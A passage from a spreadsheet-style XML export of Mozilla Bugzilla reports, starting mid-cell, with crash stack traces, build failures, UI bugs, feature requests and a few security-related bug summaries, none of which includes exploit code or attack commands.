		}
				Row 1
				Row 2
				Row 3
				Row 4
		&lt;input type=button onclick=toggleRow('row4') value=Toggle 
Row 4	
&lt;/html</t>
  </si>
  <si>
    <t>paulsperanza</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-181421</t>
  </si>
  <si>
    <t>Crash on quit with history sidebar open</t>
  </si>
  <si>
    <t>We crash on quit if you have history visible in the sidebar and quit with
Command-Q (and maybe the menu item as well).
Stack is
hread 0 Crashed:
 #0   0x0198988c in AddNullTerminator(nsStr&amp;) (nsStr.cpp:340)
 #1   0x018f16a4 in nsStrPrivate::EnsureCapacity(nsStr&amp; unsigned) (nsStr.cpp:126)
 #2   0x018f1784 in nsStrPrivate::GrowCapacity(nsStr&amp; unsigned) (nsStr.cpp:150)
 #3   0x018f5a44 in nsCString::SetCapacity(unsigned) (nsString.cpp:181)
 #4   0x018f59c0 in nsCString::SetLength(unsigned) (nsString.cpp:164)
 #5   0x018e7764 in nsACString::UncheckedAssignFromReadable(nsACString const&amp;)
(nsAString.cpp:786)
 #6   0x018e75ac in nsACString::do_AssignFromReadable(nsACString const&amp;)
(nsAString.cpp:757)
 #7   0x018e7830 in nsACString::do_AssignFromElementPtr(char const*)
(nsAString.cpp:795)
 #8   0x01951fa0 in nsACString::Assign(char const*) (nsVariant.cpp:513)
 #9   0x018863f0 in nsLocalFile::GetNativePath(nsACString&amp;) (nsLocalFileOSX.cpp:858)
 #10  0x0189fd7c in nsRegistry::OpenWellKnownRegistry(int) (nsRegistry.cpp:547)
 #11  0x0189148c in nsComponentManagerImpl::PlatformInit()
(nsComponentManager.cpp:891)
 #12  0x018908a0 in nsComponentManagerImpl::Init() (nsComponentManager.cpp:757)
 #13  0x0181c4a8 in NS_InitXPCOM2 (nsXPComInit.cpp:393)
 #14  0x01899b14 in NS_GetComponentManager (nsComponentManager.cpp:3484)
 #15  0x01900670 in nsCreateInstanceByContractID::operator()(nsID const&amp;
void**) const (nsComponentManagerUtils.cpp:73)
 #16  0x12996ef4 in nsCOMPtr::assign_from_helper(nsCOMPtr_helper
const&amp; nsID const&amp;) (nsBookmarksService.cpp:922)
 #17  0x12992ad4 in nsCOMPtr::operator=(nsCOMPtr_helper const&amp;)
(nsBookmarksService.cpp:604)
 #18  0x12922da0 in nsGlobalHistory::GetNow() (nsGlobalHistory.cpp:1761)
 #19  0x12927930 in nsGlobalHistory::ExpireEntries(int) (nsGlobalHistory.cpp:2777)
 #20  0x129279bc in nsGlobalHistory::CloseDB() (nsGlobalHistory.cpp:2792)
 #21  0x1291c62c in nsGlobalHistory::~nsGlobalHistory [unified]()
(nsGlobalHistory.cpp:546)
 #22  0x1291c50c in nsGlobalHistory::~nsGlobalHistory [in-charge deleting]()
(nsGlobalHistory.cpp:581)
 #23  0x1291cee4 in nsGlobalHistory::Release() (nsGlobalHistory.cpp:598)
 #24  0x0004f9ec in -[RDFOutlineViewDataSource cleanup]
(RDFOutlineViewDataSource.mm:80)
 #25  0x0004f88c in -[RDFOutlineViewDataSource dealloc]
(RDFOutlineViewDataSource.mm:71)
 #26  0x0004e4f8 in -[HistoryDataSource dealloc] (HistoryDataSource.mm:147)
 #27  0x90132674 in CFRelease
 #28  0x90135d90 in __CFArrayReleaseValues
 #29  0x90135ed4 in __CFArrayDeallocate
 #30  0x90132794 in CFRelease
 #31  0x907e2660 in NSPopAutoreleasePool
 #32  0x90821928 in +[NSAutoreleasePool releaseAllPools]
 #33  0x930c81ac in -[NSApplication _deallocHardCore:]
 #34  0x930ccb44 in -[NSApplication terminate:]
 #35  0x930cfe2c in -[NSApplication sendAction:to:from:]
 #36  0x9320fd18 in -[NSMenu performActionForItemAtIndex:]
 #37  0x9310a164 in -[NSCarbonMenuImpl performActionWithHighlightingForItemAtIndex:]
 #38  0x9320f0c8 in -[NSMenu performKeyEquivalent:]
 #39  0x930cdd7c in -[NSApplication sendEvent:]
 #40  0x930ca524 in -[NSApplication run]
 #41  0x930d2598 in NSApplicationMain
 #42  0x000027b4 in main (main.m:53)
 #43  0x000024b0 in _start (crt.c:267)
 #44  0x00002330 in start
We need to do some XPCOM cleanup of the history data source earlier (in response
to xpcom shutdown notifications).</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-526662</t>
  </si>
  <si>
    <t>XMLParser needs to stop at NUL char</t>
  </si>
  <si>
    <t>The FP9/FP10 version of XMLParser16 always stopped parsing when it found a null character (charcode = 0) regardless of string length. The current version does not. It needs to for bug compatibility since some extant code relies on this behavior.</t>
  </si>
  <si>
    <t>stejohns</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-449089</t>
  </si>
  <si>
    <t>Add option to disable Register button</t>
  </si>
  <si>
    <t>People using a central authentication point (like LDAP) probably won't want people registering as a local user.  There should be a checkbox in the admin panel to remove this functionality.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-410979</t>
  </si>
  <si>
    <t>fxdbug-win32-tb has been building for 10.5+ hours</t>
  </si>
  <si>
    <t>WINNT 5.2 fxdbug-win32-tb Depend Debug + Leak Test
Started 06:37 still building..
10 hours 30 minutes elapsed
... yeah ...</t>
  </si>
  <si>
    <t>FIREFOX-361239</t>
  </si>
  <si>
    <t>Bookmark This Tab...: Show all the bookmarks folders pushbutton no longer works</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8
Bookmark This Tab...: In Add Bookmark dialog box Show all the bookmarks folders pushbutton no longer works correctly in Dell XPS 4100 desktop [after installing a new NIC card 3Com EtherLink 10/100 PCI For Complete PC Management NIC (3C905C-TX)]. No problem previously nor with an IBM OEM T30 ThinkPad.
Reproducible: Always
Steps to Reproduce:
1. right click tab
2. left click on Show pushbutton to open scrolling list box.
3. instead New Folder pushbutton is displayed to the left of OK and Cancel pushbuttons.
To workaround: 
1. Save the bookmark in New Folder.
2. Rename the New Folder such as Bookmark Cache
3. Save future bookmarks in the renamed new folder (which will appear in the pulldown history list).
4. Move bookmarks from the new folder as appropriate.</t>
  </si>
  <si>
    <t>wlfoote</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-464446</t>
  </si>
  <si>
    <t>adopt source package build target in comm-central apps</t>
  </si>
  <si>
    <t>Bug 456373 added a build target to create a source package - this still needs the actual root build target to be added for the comm-central apps which is an easy patch to the build.mk files.</t>
  </si>
  <si>
    <t>CORE-348462</t>
  </si>
  <si>
    <t>a large font-size will crash firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 it rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 it rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5
I obtained this crash when viewing a page which contained a css directive with large value for font-size attribute.
Reproducible: Always
Steps to Reproduce:
1. open the example file
Actual Results:  
Firefox crashes
Expected Results:  
Correct rendering or maybe wrap the font-size to a fixed value...?
I'm using Gentoo mozilla-firefox-bin package.</t>
  </si>
  <si>
    <t>g.ficara</t>
  </si>
  <si>
    <t>CORE-117153</t>
  </si>
  <si>
    <t>build crashes on startup with PAC enabled</t>
  </si>
  <si>
    <t>This affects 0.9.7 builds as well as builds from the tip at least as of Dec 27
2001.
If I have my pac file enabled I will crash often (half the time) on startup. 
Here's a stack trace of both the UI thread (thread 1) and thread 6 which is
accessing the PAC file.
(gdb) thread 1
[Switching to thread 1 (Thread 1024 (LWP 26972))]#0  0x405eeb85 in __sigsuspend
    (set=0xbfffe250) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
45
../sysdeps/unix/sysv/linux/sigsuspend.c: No such file or directory.
	in ../sysdeps/unix/sysv/linux/sigsuspend.c
Current language:  auto currently c
(gdb) where
#0  0x405eeb85 in __sigsuspend (set=0xbfffe250)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4030c1c9 in __pthread_wait_for_restart_signal (self=0x40314f40)
    at pthread.c:969
#2  0x4030df09 in __pthread_alt_lock (lock=0x406f4fa0 self=0x0)
    at restart.h:34
#3  0x4030ad16 in __pthread_mutex_lock (mutex=0x406f4f90) at mutex.c:120
#4  0x40640fe8 in __libc_free (mem=0x8188c28) at malloc.c:3152
#5  0x401ad95e in PL_DHashFreeTable (table=0x402a8ca0 ptr=0x8188c28)
    at pldhash.c:69
#6  0x401ae30b in ChangeTable (table=0x402a8ca0 deltaLog2=1) at pldhash.c:468
#7  0x401ae411 in PL_DHashTableOperate (table=0x402a8ca0 key=0xbfffe524 
    op=PL_DHASH_ADD) at pldhash.c:513
#8  0x401afd34 in GetAtomHashEntry (aString=@0xbfffe510) at nsAtomTable.cpp:276
#9  0x401afd73 in NS_NewAtom (aString=@0xbfffe510) at nsAtomTable.cpp:284
#10 0x4167f033 in nsCSSSelector::SetTag (this=0xbfffe650 aTag=@0xbfffe510)
    at nsCSSStyleRule.cpp:470
#11 0x41671eac in CSSParserImpl::ParseTypeOrUniversalSelector (
    this=0x426b7638 aDataMask=@0xbfffe5f0 aSelector=@0xbfffe650 
    aParsingStatus=@0xbfffe5ec aErrorCode=@0xbfffe740 aIsNegated=0)
    at nsCSSParser.cpp:1882
#12 0x416730b7 in CSSParserImpl::ParseSelector (this=0x426b7638 
    aErrorCode=@0xbfffe740 aSelector=@0xbfffe650) at nsCSSParser.cpp:2347
#13 0x4167148b in CSSParserImpl::ParseSelectorGroup (this=0x426b7638 
    aErrorCode=@0xbfffe740 aList=@0xbfffe6c0) at nsCSSParser.cpp:1598
#14 0x41670fd4 in CSSParserImpl::ParseSelectorList (this=0x426b7638 
    aErrorCode=@0xbfffe740 aListHead=@0xbfffe700) at nsCSSParser.cpp:1498
#15 0x41670dd9 in CSSParserImpl::ParseRuleSet (this=0x426b7638 
    aErrorCode=@0xbfffe740 
    aAppendFunc=0x4166df5c  
    aData=0x426b7638) at nsCSSParser.cpp:1438
#16 0x4166eb90 in CSSParserImpl::Parse (this=0x426b7638 aInput=0x426b79a8 
    aInputURL=0x426c1818 aResult=@0xbfffe8a4) at nsCSSParser.cpp:614
#17 0x4166acd5 in CSSLoaderImpl::ParseSheet (this=0x426b69e8 aIn=0x426b79a8 
    aLoadData=0x426b7920 aCompleted=@0xbfffe8a8 aSheet=@0xbfffe8a4)
    at nsCSSLoader.cpp:943
#18 0x4166bce6 in CSSLoaderImpl::LoadSheet (this=0x426b69e8 aKey=@0xbfffe940 
    aData=0x426b7920) at nsCSSLoader.cpp:1272
#19 0x4166cda7 in CSSLoaderImpl::LoadChildSheet (this=0x426b69e8 
    aParentSheet=0x426b6cf0 aURL=0x426c1818 aMedia=@0xbfffea20 
    aDefaultNameSpaceID=-1 aIndex=2 aParentRule=0x426b78ac)
    at nsCSSLoader.cpp:1573
#20 0x41670104 in CSSParserImpl::ProcessImport (this=0x426b6e08 
    aErrorCode=@0xbfffebc0 aURLSpec=@0xbfffeac0 aMedia=@0xbfffea20 
    aAppendFunc=0x4166df5c  
    aData=0x426b6e08) at nsCSSParser.cpp:1163
#21 0x4166fe88 in CSSParserImpl::ParseImportRule (this=0x426b6e08 
    aErrorCode=@0xbfffebc0 
    aAppendFunc=0x4166df5c  
    aData=0x426b6e08) at nsCSSParser.cpp:1122
#22 0x4166f8e2 in CSSParserImpl::ParseAtRule (this=0x426b6e08 
    aErrorCode=@0xbfffebc0 
    aAppendFunc=0x4166df5c  
    aData=0x426b6e08) at nsCSSParser.cpp:981
#23 0x4166eb66 in CSSParserImpl::Parse (this=0x426b6e08 aInput=0x426b72a8 
    aInputURL=0x426b6900 aResult=@0x419730ac) at nsCSSParser.cpp:610
#24 0x4166acd5 in CSSLoaderImpl::ParseSheet (this=0x426b69e8 aIn=0x426b72a8 
    aLoadData=0x426b6c10 aCompleted=@0xbfffede8 aSheet=@0x419730ac)
    at nsCSSLoader.cpp:943
#25 0x4166cfa2 in CSSLoaderImpl::LoadAgentSheet (this=0x426b69e8 
    aURL=0x426b6900 aSheet=@0x419730ac aCompleted=@0xbfffede8 aObserver=0x0)
    at nsCSSLoader.cpp:1612
#26 0x415a3534 in nsContentDLF::CreateInstance (this=0x426b68e8 
    aCommand=0x412efe7a view aChannel=0x8198140 aLoadGroup=0x8160c00 
    aContentType=0xbffff194 text/html aContainer=0x8160674 aExtraInfo=0x0 
    aDocListener=0xbffff240 aDocViewer=0xbffff050) at nsContentDLF.cpp:187
#27 0x412bae4f in nsDocShell::NewContentViewerObj (this=0x8160650 
    aContentType=0xbffff194 text/html request=0x8198140 
    aLoadGroup=0x8160c00 aContentHandler=0xbffff240 aViewer=0xbffff050)
    at nsDocShell.cpp:3642
#28 0x412ba7ae in nsDocShell::CreateContentViewer (this=0x8160650 
    aContentType=0xbffff194 text/html request=0x8198140 
    aContentHandler=0xbffff240) at nsDocShell.cpp:3533
#29 0x412cedda in nsDSURIContentListener::DoContent (this=0x8160898 
    aContentType=0xbffff194 text/html aIsContentPreferred=0 
    request=0x8198140 aContentHandler=0xbffff240 aAbortProcess=0xbffff1e0)
    at nsDSURIContentListener.cpp:107
#30 0x411ed389 in nsDocumentOpenInfo::DispatchContent (this=0x8198030 
    request=0x8198140 aCtxt=0x0) at nsURILoader.cpp:355
#31 0x411ecbb1 in nsDocumentOpenInfo::OnStartRequest (this=0x8198030 
    request=0x8198140 aCtxt=0x0) at nsURILoader.cpp:226
#32 0x40b55764 in nsStreamIOChannel::OnStartRequest (this=0x8198140 
    request=0x81982f4 context=0x0) at nsInputStreamChannel.cpp:470
#33 0x40be2734 in nsOnStartRequestEvent::HandleEvent (this=0x8193bf8)
    at nsRequestObserverProxy.cpp:161
#34 0x40b601c8 in nsARequestObserverEvent::HandlePLEvent (plev=0x8193bf8)
    at nsRequestObserverProxy.cpp:115
#35 0x4020d570 in PL_HandleEvent (self=0x8193bf8) at plevent.c:590
#36 0x4020dce1 in PL_ProcessEventsBeforeID (aSelf=0x80d1f20 aID=153)
    at plevent.c:1256
#37 0x4097f1b5 in processQueue (aElement=0x80d1f20 aData=0x99)
    at nsAppShell.cpp:464
#38 0x401ca06c in nsVoidArray::EnumerateForwards (this=0x80a8770 
    aFunc=0x4097f188  aData=0x99)
    at nsVoidArray.cpp:660
#39 0x4097f1f8 in nsAppShell::ProcessBeforeID (aID=153) at nsAppShell.cpp:472
#40 0x40987fd2 in handle_gdk_event (event=0x41e57828 data=0x0)
    at nsGtkEventHandler.cpp:908
#41 0x40461d7f in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#42 0x40495773 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#43 0x40495d39 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#44 0x40495eec in g_main_run () from /usr/lib/libglib-1.2.so.0
#45 0x403b0333 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#46 0x4097ee69 in nsAppShell::Run (this=0x80de088) at nsAppShell.cpp:349
#47 0x4091b6a5 in nsAppShellService::Run (this=0x80dd758)
    at nsAppShellService.cpp:302
#48 0x0805ab75 in main1 (argc=1 argv=0xbffff794 nativeApp=0x0)
    at nsAppRunner.cpp:1264
#49 0x0805b81b in main (argc=1 argv=0xbffff794) at nsAppRunner.cpp:1594
#50 0x405dc627 in __libc_start_main (main=0x805b614  argc=1 
    ubp_av=0xbffff794 init=0x8055178  fini=0x8064d64  
    rtld_fini=0x4000dcc4  stack_end=0xbffff78c)
    at ../sysdeps/generic/libc-start.c:129
(gdb) thread 6
[Switching to thread 6 (Thread 4101 (LWP 26978))]#0  0x4067b071 in
__libc_nanosleep () from /lib/i686/libc.so.6
(gdb) where
#0  0x4067b071 in __libc_nanosleep () from /lib/i686/libc.so.6
#1  0x4067aef1 in __sleep (seconds=300)
    at ../sysdeps/unix/sysv/linux/sleep.c:85
#2  0x0805bf84 in ah_crap_handler (signum=11) at nsSigHandlers.cpp:143
#3  0x4030ca85 in pthread_sighandler (signo=11 ctx=
      {gs = 47 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh
= 0 edi = 0 esi = 134872800 ebp = 1105157892 esp = 1105157804 ebx =
1081042612 edx = 0 ecx = 3 eax = 1081035648 trapno = 14 err = 6 eip =
1080296993 cs = 35 __csh = 0 eflags = 66054 esp_at_signal = 1105157804 ss =
43 __ssh = 0 fpstate = 0x41df5c30 oldmask = 2147483648 cr2 = 12}) at
signals.c:97
#4  
#5  0x40640621 in chunk_alloc (ar_ptr=0x406f4b80 nb=24) at malloc.c:2878
#6  0x40640428 in __libc_malloc (bytes=16) at malloc.c:2811
#7  0x4072300d in __builtin_new (sz=16) from /usr/lib/libstdc++-libc6.2-2.so.3
#8  0x40247ba2 in nsXPIDLCString::PrepareForUseAsOutParam (this=0x41df60bc)
    at nsXPIDLString.cpp:207
#9  0x08062c94 in nsXPIDLCString::getter_Copies_t::operator char ** (
    this=0x41df5fe4) at ../../dist/include/string/nsXPIDLString.h:320
#10 0x40a108f4 in nsPrefBranch::GetComplexValue (this=0x81189c0 
    aPrefName=0x41214000 helpers.private_mime_types_file aType=@0x8097040 
    _retval=0x41df614c) at nsPrefBranch.cpp:316
#11 0x40a1e74a in nsPrefService::GetComplexValue (this=0x8118990 
    aPrefName=0x41214000 helpers.private_mime_types_file aType=@0x8097040 
    aValue=0x41df614c) at nsPrefService.h:57
#12 0x40a0e44e in nsPref::CopyUnicharPref (this=0x8118908 
    pref=0x41214000 helpers.private_mime_types_file _retval=0x809fee8)
    at nsPref.cpp:395
#13 0x411fbaa9 in LookUpTypeAndDescription (aFileExtension=@0x41df623c 
    aMajorType=@0x41df65fc aMinorType=@0x41df655c aDescription=@0x41df64bc)
    at ./unix/nsOSHelperAppService.cpp:277
#14 0x411ff4be in nsOSHelperAppService::GetFromExtension (this=0x81439a8 
    aFileExt=0x8136a18 pac _retval=0x41df67bc)
    at ./unix/nsOSHelperAppService.cpp:1161
#15 0x411f8fab in nsExternalHelperAppService::GetTypeFromExtension (
    this=0x81439a8 aFileExt=0x8136a18 pac aContentType=0x426bb540)
    at nsExternalHelperAppService.cpp:1454
#16 0x411f96b4 in nsExternalHelperAppService::GetTypeFromFile (this=0x81439a8 
    aFile=0x41e5d638 aContentType=0x426bb540)
    at nsExternalHelperAppService.cpp:1589
#17 0x40b4e636 in nsFileIO::Open (this=0x426bb5b0 contentType=0x426bb540 
    contentLength=0x426bb574) at nsFileStreams.cpp:220
#18 0x40b51a3f in nsFileTransport::Process (this=0x426bb520 progressSink=0x0)
    at nsFileTransport.cpp:671
#19 0x40b518b4 in nsFileTransport::Run (this=0x426bb520)
    at nsFileTransport.cpp:638
#20 0x40213ac9 in nsThreadPoolRunnable::Run (this=0x8193800)
    at nsThread.cpp:904
#21 0x40211475 in nsThread::Main (arg=0x8193818) at nsThread.cpp:120
#22 0x402e5352 in _pt_root (arg=0x8193898) at ptthread.c:214
#23 0x40309c6f in pthread_start_thread (arg=0x41df6be0) at manager.c:284</t>
  </si>
  <si>
    <t>CORE-519949</t>
  </si>
  <si>
    <t>TM: remove LocalRootScopes</t>
  </si>
  <si>
    <t>We scan the native stack for reference now so as long the value is held on the stack somewhere (or in a register) there is no need for local root scopes. We use them in XML only. Its also a horrible API that is error prone. I hope nobody wants to argue in favor of keeping them for engine-external use. 
Igor if you want to grab this go ahead. I think you are more qualified than me. Otherwise I will get to this in a couple days when the stack scanning patch is in.</t>
  </si>
  <si>
    <t>anygregor</t>
  </si>
  <si>
    <t>TOOLKIT-444347</t>
  </si>
  <si>
    <t>Make NSPR logging a bit more useful</t>
  </si>
  <si>
    <t>I had to use this the other day and ended up having to add a bunch more just to get it to be useful.</t>
  </si>
  <si>
    <t>CORE-512367</t>
  </si>
  <si>
    <t>strange behaviour when user clicks to zoom an image in an iframe on a page that is being full paged zoomed</t>
  </si>
  <si>
    <t>STR:
1. Visit https://bugzilla.mozilla.org/attachment.cgi?id=395281&amp;action=edit
2. Click to zoom the screenshot that's in the attachment details frame
Expected: scrollbars at the edge of the iframe
Actual: scrollbars are inset scrolling the zoomed image leaves artifacts (see screenshot)
Think this might be OSX only</t>
  </si>
  <si>
    <t>CORE-509089</t>
  </si>
  <si>
    <t>clean up AttemptToStabilizeTree</t>
  </si>
  <si>
    <t>Created attachment 393234
proposed changes
It is really hard to read/edit this function and it needed a bunch of changes for recursion. I've split it up into smaller pieces. The functionality should be exactly the same.
I also got rid of those static inlines for reading VMSideExit typemaps.</t>
  </si>
  <si>
    <t>BUGZILLA-292544</t>
  </si>
  <si>
    <t>[SECURITY] Can see a security-sensitive bug in buglist.cgi for a short time when there are certain performance problems</t>
  </si>
  <si>
    <t>I'm not in the security group for bugzilla.mozilla.org but I saw bug 292541 
in the query for todays new bugs for a few (2-3) minutes until it disappeared.
292541     cri    --    PC    nobody@mozilla.org    UNCO       Firefox/Xorg
crash when site loads
I could not access the bug itself because i got a security error :
You are not authorized to access bug #292541.
 the security flag was set by the reporter according to the bug history.
 if you don't have security access and you saw it at all please file
a security-flagged bug against Bugzilla on it.</t>
  </si>
  <si>
    <t>NSPR-399647</t>
  </si>
  <si>
    <t>OS/2 build break in nsprpub/pr/src/io/prlog.c</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9a9pre) Gecko/2007101000 Minefield/3.0a9pre
Build Identifier: 
E:/usr/src/mozilla/nsprpub/pr/src/io/prlog.c: In function `PR_LogPrint':
E:/usr/src/mozilla/nsprpub/pr/src/io/prlog.c:495: error: assignment of read-only location
E:/usr/src/mozilla/nsprpub/pr/src/io/prlog.c:495: error: assignment of read-only location
E:/usr/src/mozilla/nsprpub/pr/src/io/prlog.c:497: warning: implicit declaration
of function `md_UnlockAndPostNotifies'
make.exe[6]: *** [prlog.o] Error 1
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>BUGZILLA-188264</t>
  </si>
  <si>
    <t>migrating user activity from one account to another (merge user accounts)</t>
  </si>
  <si>
    <t>In rare cases it may be useful to migrate user activity from one account to
another.  A script for doing this would be useful.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-432923</t>
  </si>
  <si>
    <t>inconsistent Bugzilla icons</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008050806 Minefield/3.0pre
Build Identifier: 
Compare the Bugzilla icons on
http://www.mozilla.org/ (square orange background)
http://www.mozilla.org/products/ (round gray background)
http://www.mozilla.org/download.html (round pink background)
http://www.bugzilla.org/ (square with rounded corners purple background)
Pick one
Reproducible: Always
Steps to Reproduce:
Wander around find inconsistent Bugzilla icons.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-450461</t>
  </si>
  <si>
    <t>add curtis bartley to fx-team</t>
  </si>
  <si>
    <t>Could you please add cbartley@mozilla.com to the fx-team mailing list?
thanks!</t>
  </si>
  <si>
    <t>CORE-489291</t>
  </si>
  <si>
    <t>Full screen SVG animation causes Firefox 3.5b4pre to hog the CPU and become laggy and unresponsive.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090420 Shiretoko/3.5b4pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090420 Shiretoko/3.5b4pre
While visiting http://srufaculty.sru.edu/david.dailey/svg/balloon.svg I noticed that the animation wasn't very smooth and that Firefox was acting a little laggy and I checked task manager and Firefox was hogging teh CPU with usage spiking up to 100%.
Reproducible: Always
Steps to Reproduce:
1. Open Firefox 3.5b4pre
2. Visit http://srufaculty.sru.edu/david.dailey/svg/balloon.svg
Actual Results:  
Animation is not smooth Firefox 3.5b4pre is hogging the CPU and becomes laggy and unresponsive.
Expected Results:  
Animation should be smooth Firefox 3.5b4pre should not hog the CPU and should not become unresponsive while displaying this page.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-118572</t>
  </si>
  <si>
    <t>Extended delete functions dont work with login:password urls</t>
  </si>
  <si>
    <t>Into History tool (Tasks-&gt;Tools-&gt;History) here is a funcrion 'Delete entire
domain' (Edit-&gt;Delete entire domain ). 
 It doesn't work (disabled in UI) for domains which have URLs like:
http://login:password@www.foo.com/
 Also Delete all from ... function (Edit-&gt;Delete all from ) will
look like 'Delete all from login' and therefore not work too.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-131013</t>
  </si>
  <si>
    <t>Import folders from Outlook containing hash sign (#) or slash (/) results in error [cannot create proxy objec]</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 Q312461)
BuildID:    2002031104
I receive a could not create proxy folder error when attempting to import 
folders that contain non-alphanumeric characters (#/etc).  The cause appears 
to be the inability to create the temporary folders required during import for 
these folders due to restrictions on the Windows operating system for folder 
names.
Reproducible: Always
Steps to Reproduce:
1. Create folder in Outlook with / or # sign (or any sign not allowed by the 
Win32 filesystem)
2. Attempt to import Outlook folders from Mozilla
3. Observe proxy error.
Actual Results:  Error displayed.
Expected Results:  Import should have succeeded.
Since Mozilla stores folders as files files cannot contain symbols restricted 
by the Win32 filesystem.  This may or may not be an advantage for the mailer 
though it may affect folders that use irregular symbols.
A workaround is to rename the folders to remove these characters before 
importing.</t>
  </si>
  <si>
    <t>vhou</t>
  </si>
  <si>
    <t>BUGZILLA-172874</t>
  </si>
  <si>
    <t>cvs remove attachstatus templates</t>
  </si>
  <si>
    <t>editattachstatuses.cgi has gone but the templates in
template/en/default/attachment remain.
Gerv</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-162638</t>
  </si>
  <si>
    <t>st.com - Javascript popup fails</t>
  </si>
  <si>
    <t>I access ST Microelectronics site daily from work. The Product selector menu item does not work with mozilla 1.1b + W2k. Bug?
Steps to reproduce:
1. Click on MOSFET item
2. Click on Prod. Selector item from the menubar in the popup window
Result:
Popup window stays blank.
Expected result:
List of components in the selected category (IE6).</t>
  </si>
  <si>
    <t>ollittm</t>
  </si>
  <si>
    <t>FIREFOX-340868</t>
  </si>
  <si>
    <t>Offer to re-add an autodiscovered engine if user removes it</t>
  </si>
  <si>
    <t>If you're viewing a page with an autodiscovered  OpenSearch engine that you've already added to your searchbox list you correctly won't be offered the chance to add it to that list (once bug 340122 is fixed).
However if you remove that engine from your list using the search engine manager you still won't be offered the chance to re-add it and the UI won't change to show that an autodiscovered engine is available until you reload the page.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-481050</t>
  </si>
  <si>
    <t>Request a VM environment for win32 builds.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2
Build Identifier: 
Kindly provide me with a VM that has win32 environment ( winXP SP3 ) with Visual Studio PRO install so that I can create PGO builds.
Reproducible: Always</t>
  </si>
  <si>
    <t>murali.nandigama</t>
  </si>
  <si>
    <t>FIREFOX-245588</t>
  </si>
  <si>
    <t>Firefox does not open all tabs of a bookmarked tab session because of a malformed link (imported from galeon) wyciwyg://1/ in front of it. its stopps at this position and does not open the tabs after it.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/3.2) (KHTML like Gecko)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a2) Gecko/20040602 Firefox/0.8.0+
a bookmark file is attached. its not possible to open all tabs again (open in 
tabs) becaus FF stopps at the malformed url  wyciwyg://1/ (imported from 
galeon) 
Reproducible: Always
Steps to Reproduce:
1.open tab bookmark in tabs (attached bookmarks.html) 
2. 
3. 
Actual Results:  
it does not open the tab after the malformed url(second last tab) 
Expected Results:  
open all tabs as in bookmark and handle that malformed url as it is 
doing( doing nothing is correct) but open the good urls after it. 
make a tab session and save it as bookmark tabs 
enter in that session this url and open them all again 
 wyciwyg://1/http://www.pb-versicherung.de/karriere/stellenboerse/indexPBV.jsp</t>
  </si>
  <si>
    <t>sagebiel</t>
  </si>
  <si>
    <t>CORE-945215</t>
  </si>
  <si>
    <t>Map HZ to the replacement encoding</t>
  </si>
  <si>
    <t>Once bug 935453 has been out on the release channel for six weeks we should evaluate the results and see if we can get away with mapping HZ to the replacement encoding. (HZ is the most XSS-exploitable one of the encodings we support.)</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-529961</t>
  </si>
  <si>
    <t>ftp.m.o and stage.m.o down</t>
  </si>
  <si>
    <t>Something to do with nfs mounts probably dm-ftp01:/mnt/eql/builds
ftp.m.o is stone cold refusing connections stage is hanging when you request /pub/mozilla.org/ or deeper</t>
  </si>
  <si>
    <t>CORE-94078</t>
  </si>
  <si>
    <t>getComputedStyle adds serif to correct answer for 'font-family'</t>
  </si>
  <si>
    <t>if you query the value of the 'font-family' property using getComputedStyle
it appends serif to the correct answer.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-462814</t>
  </si>
  <si>
    <t>Stats collection for Collections</t>
  </si>
  <si>
    <t>We need a way to gather some basic information on the success of Collections.
Would like to add a downloads column to the collections table and the addons_collections table.
When a user is ready to install a bundle of add-ons from a collection we should ping a URL like /collections/stats/download?ids=186598315341234 with the IDs of the selected add-ons.
This URL will increment the counter in the collections table for the total number of downloads of that collection and will increment the counter for each add-on in addons_collections for the number of downloads of that add-on from that collection.
The normal add-on download counter should still cover the download so that the add-on gets credit for the download too.
